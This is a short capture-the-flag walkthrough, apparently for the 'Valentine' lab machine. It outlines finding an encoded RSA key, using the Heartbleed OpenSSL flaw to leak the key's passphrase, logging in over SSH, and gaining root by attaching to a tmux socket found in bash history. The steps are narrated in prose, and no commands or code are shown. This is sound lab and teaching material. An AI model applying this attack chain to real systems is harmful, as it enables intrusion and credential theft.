Valentine
Abusing SSL HeartBleed vulnerability - SSH Trouble Shooting - SUID Socket PrivEsc via tmux
Scanning
HTTP Enumeration
Viewing the source dint give me anything nor robots.txt file
Viewing the /dev gives two important files, the encode and decode endpoints are just scripts run by the backend - Tried command injections there, but nothing worked :(
The hype_key is a hex encoded string
Let’s use an online tool to convert it to text - We find out that it is an RSA private key!
Changing the permissions and tried logging via ssh
So now we need to figure the passphrase for this we can use ssh2john utility !
Nothing useful, john couldn't crack - BACK TO ENUMERATION :(
It is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of the systems protected by this vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, information, etc. It also allows attackers to eavesdrop on communications.
Inorder to exploit this we can use this script
Let’s run the exploit with a loop number of 10
We get a base64 encoded string, when we decode it - we have the passphrase !
We can now log on to the box using ssh
Encountered this error and spent some time fixing this - the fix is
Privilege Escalation
Checked the .bash_history because it wasn't linked to /dev/null
The file dev_sess was a socket file and it had a SUID bit to it - When we attached the socket process via tmux - We become root !
Last updated
